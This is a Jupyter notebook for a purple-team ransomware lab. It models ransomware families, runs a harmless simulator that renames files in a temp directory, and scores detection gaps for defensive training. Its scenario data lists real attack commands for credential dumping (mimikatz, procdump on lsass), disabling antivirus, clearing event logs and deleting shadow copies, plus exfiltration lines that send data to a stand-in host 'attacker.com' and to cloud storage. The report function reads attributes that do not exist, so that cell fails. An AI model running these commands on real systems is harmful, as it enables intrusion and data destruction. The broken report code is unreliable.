# Lab 32: Ransomware Simulation (Purple Team)

Build safe simulation tools for testing ransomware defenses.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/depalmar/ai_for_the_win/blob/main/notebooks/lab32_ransomware_simulation.ipynb)

**ETHICAL NOTE**: This lab is for authorized testing only. All simulations are safe and non-destructive.

## Learning Objectives
- Adversary emulation planning
- Safe simulation techniques
- Detection validation
- Gap analysis and reporting

**Next:** Lab 33 (Memory Forensics)

In [ ]:
import tempfile
import shutil
from pathlib import Path
from dataclasses import dataclass, field
from typing import List, Dict
from datetime import datetime
from enum import Enum

## 1. Attack Scenario Generation

In [ ]:
class RansomwareFamily(Enum):
    LOCKBIT = "lockbit"
    BLACKCAT = "blackcat"
    CONTI = "conti"
    ROYAL = "royal"
    PLAY = "play"
    AKIRA = "akira"
    BLACKBASTA = "blackbasta"
    CLOP = "clop"
    RHYSIDA = "rhysida"
    HUNTERS = "hunters_international"


@dataclass
class AttackStage:
    """Individual attack stage with detection opportunities."""

    name: str
    description: str
    mitre_technique: str
    commands: List[str]
    detection_opportunities: List[str]
    artifacts: List[str]


@dataclass
class AttackScenario:
    """Comprehensive ransomware attack scenario."""

    family: RansomwareFamily
    name: str
    description: str
    initial_access: str
    stages: List[AttackStage]
    ransom_note_pattern: str
    file_extension: str
    encryption_type: str
    exfil_method: str
    typical_dwell_time: str


# Comprehensive attack stages by phase
RECONNAISSANCE_STAGES = [
    AttackStage(
        "Network Discovery",
        "Enumerate network hosts and shares",
        "T1018",
        ["net view /all", "nltest /dclist:", "dsquery computer"],
        ["Unusual AD queries", "Net.exe execution"],
        ["DNS queries", "LDAP logs"],
    ),
    AttackStage(
        "AD Enumeration",
        "Discover domain structure and permissions",
        "T1087.002",
        ["adfind.exe -h dc01", "bloodhound-python", "ldapsearch"],
        ["BloodHound activity", "Mass LDAP queries"],
        ["4662 events", "LDAP logs"],
    ),
]

CREDENTIAL_ACCESS_STAGES = [
    AttackStage(
        "LSASS Dump",
        "Extract credentials from memory",
        "T1003.001",
        ["procdump -ma lsass.exe", "mimikatz sekurlsa::logonpasswords", "comsvcs.dll MiniDump"],
        ["LSASS access", "Suspicious DLL loads"],
        ["Memory dump files", "4656 events"],
    ),
    AttackStage(
        "NTDS Extraction",
        "Copy domain controller database",
        "T1003.003",
        ["ntdsutil 'ac i ntds' 'ifm' 'create full c:\\temp'", "vssadmin create shadow"],
        ["VSS creation on DC", "NTDS.dit access"],
        ["VSS snapshots", "4663 events"],
    ),
    AttackStage(
        "Kerberoasting",
        "Request service tickets for offline cracking",
        "T1558.003",
        ["GetUserSPNs.py", "Rubeus kerberoast"],
        ["Unusual TGS requests", "RC4 ticket requests"],
        ["4769 events"],
    ),
]

LATERAL_MOVEMENT_STAGES = [
    AttackStage(
        "PsExec Lateral",
        "Remote execution via service creation",
        "T1569.002",
        ["psexec.exe \\\\target cmd", "impacket-psexec"],
        ["PSEXESVC service", "Remote service creation"],
        ["7045 events", "5145 events"],
    ),
    AttackStage(
        "WMI Execution",
        "Remote command execution via WMI",
        "T1047",
        ["wmic /node:target process call create", "impacket-wmiexec"],
        ["WMI process creation", "wmiprvse.exe spawning"],
        ["5857-5860 events"],
    ),
    AttackStage(
        "RDP Hijacking",
        "Take over existing RDP sessions",
        "T1563.002",
        ["tscon 2 /dest:console", "quser /server:target"],
        ["Session switching", "Unusual RDP connections"],
        ["4778/4779 events"],
    ),
]

DEFENSE_EVASION_STAGES = [
    AttackStage(
        "Disable AV",
        "Terminate or disable security tools",
        "T1562.001",
        ["Set-MpPreference -DisableRealtimeMonitoring $true", "taskkill /F /IM MsMpEng.exe"],
        ["Security tool termination", "Defender config changes"],
        ["5001 events", "Registry changes"],
    ),
    AttackStage(
        "Clear Logs",
        "Remove evidence of compromise",
        "T1070.001",
        ["wevtutil cl Security", "Clear-EventLog -LogName Security"],
        ["Log clearing events", "1102 events"],
        ["1102 events"],
    ),
    AttackStage(
        "Timestomping",
        "Modify file timestamps",
        "T1070.006",
        ["touch -t 202001010000 malware.exe", "SetFileTime API"],
        ["Timestamp anomalies", "MFT analysis"],
        ["NTFS artifacts"],
    ),
]

EXFILTRATION_STAGES = [
    AttackStage(
        "Cloud Upload",
        "Exfiltrate via cloud storage",
        "T1567.002",
        ["rclone copy C:\\sensitive mega:exfil", "aws s3 cp"],
        ["Large uploads to cloud", "Unusual cloud tool usage"],
        ["Network logs", "Proxy logs"],
    ),
    AttackStage(
        "FTP Exfil",
        "Exfiltrate via FTP to attacker server",
        "T1048.003",
        ["ftp -s:script.txt attacker.com", "curl -T data.zip ftp://"],
        ["FTP to unknown hosts", "Large outbound transfers"],
        ["FTP logs", "Network flows"],
    ),
]

IMPACT_STAGES = [
    AttackStage(
        "Shadow Copy Deletion",
        "Remove backup snapshots",
        "T1490",
        ["vssadmin delete shadows /all /quiet", "wmic shadowcopy delete"],
        ["VSS deletion commands", "4688 with vssadmin"],
        ["No VSS snapshots"],
    ),
    AttackStage(
        "Backup Destruction",
        "Disable backup services",
        "T1490",
        ["sc stop vss", "bcdedit /set {default} recoveryenabled No"],
        ["Backup service stops", "Boot config changes"],
        ["7036 events"],
    ),
    AttackStage(
        "Encryption Deployment",
        "Execute ransomware payload",
        "T1486",
        ["locker.exe -path C:\\ -ext .locked", "encryptor.exe --all-drives"],
        ["Mass file modification", "Entropy changes"],
        ["MFT changes", "USN journal"],
    ),
]

# Define comprehensive scenarios for each family
SCENARIOS = {
    RansomwareFamily.LOCKBIT: AttackScenario(
        family=RansomwareFamily.LOCKBIT,
        name="LockBit 3.0 Simulation",
        description="Fast-encrypting RaaS with StealBit exfiltration and triple extortion",
        initial_access="Phishing email with malicious attachment or RDP brute force",
        stages=[
            *RECONNAISSANCE_STAGES,
            *CREDENTIAL_ACCESS_STAGES[:2],
            *LATERAL_MOVEMENT_STAGES[:2],
            *DEFENSE_EVASION_STAGES[:2],
            *EXFILTRATION_STAGES[0:1],
            *IMPACT_STAGES,
        ],
        ransom_note_pattern="[A-Za-z0-9]{8}\\.README\\.txt",
        file_extension=".lockbit",
        encryption_type="AES-256 + RSA-2048",
        exfil_method="StealBit custom tool",
        typical_dwell_time="1-3 days (fast operator)",
    ),
    RansomwareFamily.BLACKCAT: AttackScenario(
        family=RansomwareFamily.BLACKCAT,
        name="BlackCat/ALPHV Simulation",
        description="Rust-based cross-platform ransomware with ExMatter exfiltration",
        initial_access="Compromised credentials, vulnerability exploitation (Exchange, VPN)",
        stages=[
            *RECONNAISSANCE_STAGES,
            *CREDENTIAL_ACCESS_STAGES,
            *LATERAL_MOVEMENT_STAGES,
            *DEFENSE_EVASION_STAGES,
            *EXFILTRATION_STAGES,
            *IMPACT_STAGES,
        ],
        ransom_note_pattern="RECOVER-[A-Za-z0-9]+-FILES\\.txt",
        file_extension=".alphv",
        encryption_type="ChaCha20 + RSA-4096",
        exfil_method="ExMatter custom tool",
        typical_dwell_time="5-14 days",
    ),
    RansomwareFamily.ROYAL: AttackScenario(
        family=RansomwareFamily.ROYAL,
        name="Royal Ransomware Simulation",
        description="Former Conti members using callback phishing and custom loaders",
        initial_access="Callback phishing (BazarCall), Google Ads malvertising",
        stages=[
            *RECONNAISSANCE_STAGES[:1],
            *CREDENTIAL_ACCESS_STAGES[:2],
            *LATERAL_MOVEMENT_STAGES[:2],
            *DEFENSE_EVASION_STAGES[:1],
            *EXFILTRATION_STAGES[:1],
            *IMPACT_STAGES,
        ],
        ransom_note_pattern="README\\.TXT",
        file_extension=".royal",
        encryption_type="AES-256 + RSA-2048",
        exfil_method="Cobalt Strike or custom tools",
        typical_dwell_time="3-7 days",
    ),
    RansomwareFamily.PLAY: AttackScenario(
        family=RansomwareFamily.PLAY,
        name="Play Ransomware Simulation",
        description="Intermittent encryption for speed, targets Latin America and Europe",
        initial_access="FortiOS and Exchange vulnerabilities (CVE-2022-41082)",
        stages=[
            *RECONNAISSANCE_STAGES,
            *CREDENTIAL_ACCESS_STAGES[:2],
            *LATERAL_MOVEMENT_STAGES[:1],
            *DEFENSE_EVASION_STAGES,
            AttackStage(
                "Intermittent Encryption",
                "Encrypt only portions of files for speed",
                "T1486",
                ["play.exe --partial-encrypt", "Encrypt every 16 bytes"],
                ["Partial file modification", "Fast encryption pattern"],
                ["File headers intact"],
            ),
            *IMPACT_STAGES[:-1],
        ],
        ransom_note_pattern="ReadMe\\.txt",
        file_extension=".play",
        encryption_type="AES-RSA (intermittent)",
        exfil_method="WinSCP, WinRAR to cloud",
        typical_dwell_time="2-5 days",
    ),
    RansomwareFamily.AKIRA: AttackScenario(
        family=RansomwareFamily.AKIRA,
        name="Akira Ransomware Simulation",
        description="Retro-themed ransomware targeting VMware ESXi and Windows",
        initial_access="Cisco VPN vulnerabilities, compromised credentials",
        stages=[
            *RECONNAISSANCE_STAGES,
            *CREDENTIAL_ACCESS_STAGES[:2],
            *LATERAL_MOVEMENT_STAGES,
            AttackStage(
                "ESXi Targeting",
                "Encrypt virtual machine disks",
                "T1486",
                ["esxcli vm process kill", "vim-cmd vmsvc/getallvms"],
                ["ESXi CLI commands", "VM shutdown"],
                ["ESXi logs"],
            ),
            *DEFENSE_EVASION_STAGES[:2],
            *EXFILTRATION_STAGES,
            *IMPACT_STAGES,
        ],
        ransom_note_pattern="akira_readme\\.txt",
        file_extension=".akira",
        encryption_type="ChaCha20 + RSA-4096",
        exfil_method="WinRAR + cloud upload",
        typical_dwell_time="4-10 days",
    ),
    RansomwareFamily.RHYSIDA: AttackScenario(
        family=RansomwareFamily.RHYSIDA,
        name="Rhysida Ransomware Simulation",
        description="Targets healthcare and education, uses legitimate tools extensively",
        initial_access="Phishing, VPN vulnerabilities, Cobalt Strike delivery",
        stages=[
            *RECONNAISSANCE_STAGES,
            *CREDENTIAL_ACCESS_STAGES,
            *LATERAL_MOVEMENT_STAGES,
            AttackStage(
                "LOTL Tools",
                "Living-off-the-land with legitimate admin tools",
                "T1218",
                ["PsExec.exe", "secretsdump.py", "ntdsutil"],
                ["Legitimate tool abuse", "Unusual admin activity"],
                ["Process logs"],
            ),
            *DEFENSE_EVASION_STAGES,
            *EXFILTRATION_STAGES,
            *IMPACT_STAGES,
        ],
        ransom_note_pattern="CriticalBreachDetected\\.pdf",
        file_extension=".rhysida",
        encryption_type="ChaCha20 + RSA-4096 (4096-bit)",
        exfil_method="Custom PowerShell + cloud",
        typical_dwell_time="7-21 days",
    ),
}

print("=" * 60)
print("COMPREHENSIVE RANSOMWARE ATTACK SCENARIOS")
print("=" * 60)
for family, scenario in SCENARIOS.items():
    print(f"\n{'='*60}")
    print(f"🔐 {scenario.name}")
    print(f"{'='*60}")
    print(f"Description: {scenario.description}")
    print(f"Initial Access: {scenario.initial_access}")
    print(f"Dwell Time: {scenario.typical_dwell_time}")
    print(f"File Extension: {scenario.file_extension}")
    print(f"Encryption: {scenario.encryption_type}")
    print(f"Exfiltration: {scenario.exfil_method}")
    print(f"\nAttack Stages ({len(scenario.stages)} total):")
    for i, stage in enumerate(scenario.stages[:5], 1):  # Show first 5
        print(f"  {i}. [{stage.mitre_technique}] {stage.name}")
    if len(scenario.stages) > 5:
        print(f"  ... and {len(scenario.stages) - 5} more stages")

## 2. Safe Simulator

In [ ]:
@dataclass
class SimulationConfig:
    """Safe simulation configuration."""

    target_directory: str
    file_extensions: List[str] = field(default_factory=lambda: [".txt", ".docx"])
    simulate_encryption: bool = True
    create_ransom_note: bool = True
    cleanup_after: bool = True


class SafeRansomwareSimulator:
    """
    Safe ransomware behavior simulator.

    SAFETY: Only operates in temp directories,
    no actual encryption, full audit logging.
    """

    def __init__(self, config: SimulationConfig):
        self.config = config
        self.audit_log = []
        self.created_files = []
        self._validate_safe_directory()

    def _validate_safe_directory(self):
        """Ensure we're in a safe directory."""
        path = Path(self.config.target_directory).resolve()
        temp_dir = Path(tempfile.gettempdir())

        if not str(path).startswith(str(temp_dir)):
            raise ValueError(f"Target must be in temp directory: {temp_dir}")

        path.mkdir(parents=True, exist_ok=True)

    def _log(self, action: str, details: Dict):
        self.audit_log.append(
            {"timestamp": datetime.now().isoformat(), "action": action, **details}
        )

    def setup_test_files(self, num_files: int = 5) -> List[str]:
        """Create test files for simulation."""
        files = []
        target = Path(self.config.target_directory)

        for i in range(num_files):
            for ext in self.config.file_extensions:
                filepath = target / f"test_file_{i}{ext}"
                filepath.write_text(f"Test content for {filepath.name}")
                files.append(str(filepath))
                self.created_files.append(str(filepath))

        self._log("SETUP", {"files_created": len(files)})
        return files

    def simulate_encryption(self, files: List[str]) -> Dict:
        """Simulate encryption (just renaming, NOT actual encryption)."""
        if not self.config.simulate_encryption:
            return {"simulated": False}

        affected = 0
        for filepath in files:
            original = Path(filepath)
            if original.exists():
                new_path = str(original) + ".encrypted"
                shutil.move(str(original), new_path)
                affected += 1
                self._log("ENCRYPT_SIM", {"file": str(original)})

        return {"simulated": True, "files_affected": affected}

    def create_ransom_note(self) -> str:
        """Create simulated ransom note."""
        if not self.config.create_ransom_note:
            return ""

        note = f"""
=== SIMULATION RANSOM NOTE ===
This is a SIMULATED ransom note for purple team testing.
No actual ransomware was deployed.

Test ID: PURPLE-TEAM-{datetime.now().strftime('%Y%m%d-%H%M%S')}
=== END SIMULATION ===
"""

        note_path = Path(self.config.target_directory) / "README_RESTORE_FILES.txt"
        note_path.write_text(note)
        self.created_files.append(str(note_path))
        self._log("RANSOM_NOTE", {"path": str(note_path)})

        return str(note_path)

    def cleanup(self):
        """Clean up all created files."""
        if not self.config.cleanup_after:
            return

        for filepath in self.created_files:
            path = Path(filepath)
            if path.exists():
                path.unlink()
            # Also check for .encrypted version
            enc_path = Path(filepath + ".encrypted")
            if enc_path.exists():
                enc_path.unlink()

        self._log("CLEANUP", {"files_removed": len(self.created_files)})

In [ ]:
# Run simulation
with tempfile.TemporaryDirectory() as tmpdir:
    config = SimulationConfig(
        target_directory=tmpdir,
        simulate_encryption=True,
        create_ransom_note=True,
        cleanup_after=True,
    )

    simulator = SafeRansomwareSimulator(config)

    # Run simulation
    print("Running Safe Simulation:")
    print("=" * 40)

    files = simulator.setup_test_files(num_files=3)
    print(f"1. Created {len(files)} test files")

    result = simulator.simulate_encryption(files)
    print(f"2. Simulated encryption of {result['files_affected']} files")

    note = simulator.create_ransom_note()
    print(f"3. Created ransom note: {Path(note).name}")

    # Show audit log
    print(f"\nAudit Log: {len(simulator.audit_log)} entries")

    # Cleanup
    simulator.cleanup()
    print("4. Cleanup complete")

## 3. Detection Validation

In [ ]:
class DetectionStatus(Enum):
    DETECTED = "detected"
    MISSED = "missed"
    PENDING = "pending"
    PARTIAL = "partial"


@dataclass
class DetectionTest:
    name: str
    technique_id: str
    description: str
    log_sources: List[str]
    detection_logic: str
    status: DetectionStatus = DetectionStatus.PENDING
    confidence: float = 0.0


class ComprehensiveDetectionValidator:
    """Validate detection coverage across the full attack chain."""

    def __init__(self):
        self.tests = self._build_comprehensive_tests()

    def _build_comprehensive_tests(self) -> List[DetectionTest]:
        return [
            # Initial Access
            DetectionTest(
                "Phishing Attachment",
                "T1566.001",
                "Malicious Office document with macro execution",
                ["Email Gateway", "Endpoint", "Sysmon"],
                "Office process spawning cmd/powershell OR macro execution event",
            ),
            DetectionTest(
                "Exploit Public-Facing",
                "T1190",
                "Exploitation of VPN/Exchange vulnerabilities",
                ["IDS/IPS", "WAF", "Application Logs"],
                "Known CVE signatures OR unusual web shell activity",
            ),
            # Execution
            DetectionTest(
                "PowerShell Encoded",
                "T1059.001",
                "Encoded PowerShell command execution",
                ["Sysmon", "PowerShell Logs", "4688"],
                "Process creation with -enc/-encodedcommand OR ScriptBlock logging",
            ),
            DetectionTest(
                "WMI Execution",
                "T1047",
                "WMI process creation for lateral movement",
                ["Sysmon", "5857-5860"],
                "WMI-Activity events OR wmiprvse.exe spawning processes",
            ),
            # Persistence
            DetectionTest(
                "Scheduled Task",
                "T1053.005",
                "Scheduled task created for persistence",
                ["4698", "Sysmon"],
                "Event 4698 creation OR schtasks.exe with /create",
            ),
            DetectionTest(
                "Registry Run Keys",
                "T1547.001",
                "Registry modification for persistence",
                ["Sysmon", "4657"],
                "Registry modification in Run/RunOnce keys",
            ),
            # Credential Access
            DetectionTest(
                "LSASS Access",
                "T1003.001",
                "LSASS memory access for credential theft",
                ["Sysmon 10", "4656", "4663"],
                "Process accessing lsass.exe memory OR suspicious DLL injection",
            ),
            DetectionTest(
                "NTDS.dit Access",
                "T1003.003",
                "Domain controller database theft",
                ["4663", "VSS Events"],
                "Access to ntds.dit OR shadow copy creation on DC",
            ),
            DetectionTest(
                "Kerberoasting",
                "T1558.003",
                "Mass TGS requests for offline cracking",
                ["4769"],
                "Multiple 4769 events with RC4 encryption type",
            ),
            # Discovery
            DetectionTest(
                "AD Enumeration",
                "T1087.002",
                "Active Directory reconnaissance",
                ["LDAP Logs", "4662"],
                "BloodHound patterns OR mass LDAP queries",
            ),
            DetectionTest(
                "Network Discovery",
                "T1018",
                "Network and host enumeration",
                ["Sysmon", "Network Logs"],
                "net.exe execution OR nltest /dclist",
            ),
            # Lateral Movement
            DetectionTest(
                "PsExec Service",
                "T1569.002",
                "Remote service creation via PsExec",
                ["7045", "5145"],
                "PSEXESVC service creation OR admin share access",
            ),
            DetectionTest(
                "RDP Tunneling",
                "T1021.001",
                "RDP connection for lateral movement",
                ["4624 Type 10", "4778/4779"],
                "Network logon via RDP from unexpected source",
            ),
            # Defense Evasion
            DetectionTest(
                "Security Tool Disable",
                "T1562.001",
                "Antivirus/EDR tampering",
                ["5001", "Sysmon", "EDR Telemetry"],
                "Security software process termination OR config changes",
            ),
            DetectionTest(
                "Log Clearing",
                "T1070.001",
                "Windows event log clearing",
                ["1102"],
                "Security log cleared event (1102)",
            ),
            DetectionTest(
                "Timestomping",
                "T1070.006",
                "File timestamp manipulation",
                ["Sysmon 2", "MFT Analysis"],
                "File creation time modification OR MFT anomalies",
            ),
            # Exfiltration
            DetectionTest(
                "Cloud Exfiltration",
                "T1567.002",
                "Data exfiltration to cloud storage",
                ["Proxy Logs", "DNS", "Network Flows"],
                "Large uploads to cloud storage OR rclone/mega usage",
            ),
            DetectionTest(
                "DNS Exfiltration",
                "T1048.001",
                "Data hidden in DNS queries",
                ["DNS Logs", "Network"],
                "High entropy DNS queries OR excessive subdomain requests",
            ),
            # Impact
            DetectionTest(
                "Shadow Copy Deletion",
                "T1490",
                "VSS shadow copy deletion",
                ["4688", "Sysmon 1"],
                "vssadmin delete shadows OR wmic shadowcopy delete",
            ),
            DetectionTest(
                "Backup Service Stop",
                "T1490",
                "Backup service termination",
                ["7036", "Sysmon 1"],
                "Service stop events for backup services",
            ),
            DetectionTest(
                "Mass File Encryption",
                "T1486",
                "Ransomware encryption activity",
                ["Sysmon 11", "USN Journal"],
                "Mass file renames OR high file entropy changes",
            ),
            DetectionTest(
                "Ransom Note Creation",
                "T1486",
                "Ransom note file creation",
                ["Sysmon 11"],
                "README/DECRYPT file creation in multiple directories",
            ),
            DetectionTest(
                "Recovery Disable",
                "T1490",
                "Boot configuration changes",
                ["4688"],
                "bcdedit /set recoveryenabled No execution",
            ),
        ]

    def simulate_detection_results(self, detection_rate: float = 0.7):
        """Simulate realistic detection results."""
        import random

        random.seed(42)

        for test in self.tests:
            rand = random.random()
            if rand < detection_rate:
                test.status = DetectionStatus.DETECTED
                test.confidence = random.uniform(0.7, 0.99)
            elif rand < detection_rate + 0.15:
                test.status = DetectionStatus.PARTIAL
                test.confidence = random.uniform(0.4, 0.7)
            else:
                test.status = DetectionStatus.MISSED
                test.confidence = random.uniform(0.0, 0.3)

    def generate_gap_analysis(self) -> Dict:
        """Generate comprehensive gap analysis."""
        detected = [t for t in self.tests if t.status == DetectionStatus.DETECTED]
        partial = [t for t in self.tests if t.status == DetectionStatus.PARTIAL]
        missed = [t for t in self.tests if t.status == DetectionStatus.MISSED]

        # Group gaps by MITRE tactic
        tactic_mapping = {
            "T1566": "Initial Access",
            "T1190": "Initial Access",
            "T1059": "Execution",
            "T1047": "Execution",
            "T1053": "Persistence",
            "T1547": "Persistence",
            "T1003": "Credential Access",
            "T1558": "Credential Access",
            "T1087": "Discovery",
            "T1018": "Discovery",
            "T1569": "Lateral Movement",
            "T1021": "Lateral Movement",
            "T1562": "Defense Evasion",
            "T1070": "Defense Evasion",
            "T1567": "Exfiltration",
            "T1048": "Exfiltration",
            "T1486": "Impact",
            "T1490": "Impact",
        }

        gaps_by_tactic = {}
        for test in missed + partial:
            tactic = tactic_mapping.get(test.technique_id.split(".")[0], "Unknown")
            if tactic not in gaps_by_tactic:
                gaps_by_tactic[tactic] = []
            gaps_by_tactic[tactic].append(
                {
                    "test": test.name,
                    "technique": test.technique_id,
                    "status": test.status.value,
                    "log_sources": test.log_sources,
                }
            )

        return {
            "total_tests": len(self.tests),
            "detected": len(detected),
            "partial": len(partial),
            "missed": len(missed),
            "coverage": f"{(len(detected)/len(self.tests))*100:.1f}%",
            "effective_coverage": f"{((len(detected) + 0.5*len(partial))/len(self.tests))*100:.1f}%",
            "gaps_by_tactic": gaps_by_tactic,
            "critical_gaps": [
                t.name for t in missed if t.technique_id in ["T1486", "T1490", "T1003.001"]
            ],
            "priority_fixes": self._prioritize_fixes(missed),
        }

    def _prioritize_fixes(self, missed: List[DetectionTest]) -> List[Dict]:
        """Prioritize which gaps to fix first."""
        priority_techniques = ["T1486", "T1490", "T1003.001", "T1059.001", "T1569.002"]
        fixes = []
        for test in missed:
            priority = "CRITICAL" if test.technique_id in priority_techniques else "HIGH"
            fixes.append(
                {
                    "test": test.name,
                    "technique": test.technique_id,
                    "priority": priority,
                    "recommended_sources": test.log_sources,
                    "detection_logic": test.detection_logic,
                }
            )
        return sorted(fixes, key=lambda x: 0 if x["priority"] == "CRITICAL" else 1)


# Run comprehensive validation
validator = ComprehensiveDetectionValidator()
validator.simulate_detection_results(detection_rate=0.65)
analysis = validator.generate_gap_analysis()

print("=" * 60)
print("COMPREHENSIVE DETECTION GAP ANALYSIS")
print("=" * 60)
print(f"\n📊 Coverage Summary:")
print(f"   Total Tests: {analysis['total_tests']}")
print(f"   Detected: {analysis['detected']} ({analysis['coverage']})")
print(f"   Partial: {analysis['partial']}")
print(f"   Missed: {analysis['missed']}")
print(f"   Effective Coverage: {analysis['effective_coverage']}")

print(f"\n🚨 Critical Gaps:")
for gap in analysis["critical_gaps"]:
    print(f"   - {gap}")

print(f"\n📋 Gaps by MITRE Tactic:")
for tactic, gaps in analysis["gaps_by_tactic"].items():
    print(f"\n   {tactic}:")
    for gap in gaps[:3]:  # Show top 3 per tactic
        print(f"      - [{gap['technique']}] {gap['test']} ({gap['status']})")

print(f"\n🔧 Priority Fixes (Top 5):")
for fix in analysis["priority_fixes"][:5]:
    print(f"   [{fix['priority']}] {fix['test']}")
    print(f"      Technique: {fix['technique']}")
    print(f"      Sources: {', '.join(fix['recommended_sources'][:2])}")

## 4. Exercise Report

In [ ]:
def generate_exercise_report(scenario: AttackScenario, gap_analysis: Dict) -> str:
    """Generate purple team exercise report."""
    return f"""
# Purple Team Exercise Report

## Scenario
- **Name**: {scenario.name}
- **Family**: {scenario.family.value}
- **Description**: {scenario.description}

## MITRE ATT&CK Techniques Tested
{chr(10).join(f'- {t}' for t in scenario.mitre_techniques)}

## Detection Coverage
- **Overall Coverage**: {gap_analysis['coverage']}
- **Tests Detected**: {gap_analysis['detected']}
- **Tests Missed**: {gap_analysis['missed']}

## Detection Gaps
{chr(10).join(f'- {g}' for g in gap_analysis['gaps']) or 'None - full coverage!'}

## Recommendations
1. Implement missing detections for identified gaps
2. Tune existing rules to reduce false negatives
3. Re-run exercise after remediation
4. Document detection playbooks

---
Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
"""


# Generate report
scenario = SCENARIOS[RansomwareFamily.LOCKBIT]
report = generate_exercise_report(scenario, analysis)
print(report)

## Summary

We built a purple team ransomware simulation framework:

1. **Scenario Generation** - Model ransomware families
2. **Safe Simulation** - Non-destructive behavior emulation
3. **Detection Validation** - Test security controls
4. **Gap Analysis** - Identify missing coverage

### Safety Features:
- Only operates in temp directories
- No actual encryption (just renaming)
- Full audit logging
- Automatic cleanup

### Next Steps:
1. Integrate with detection systems for automated validation
2. Add more ransomware family profiles
3. Create scheduled exercise automation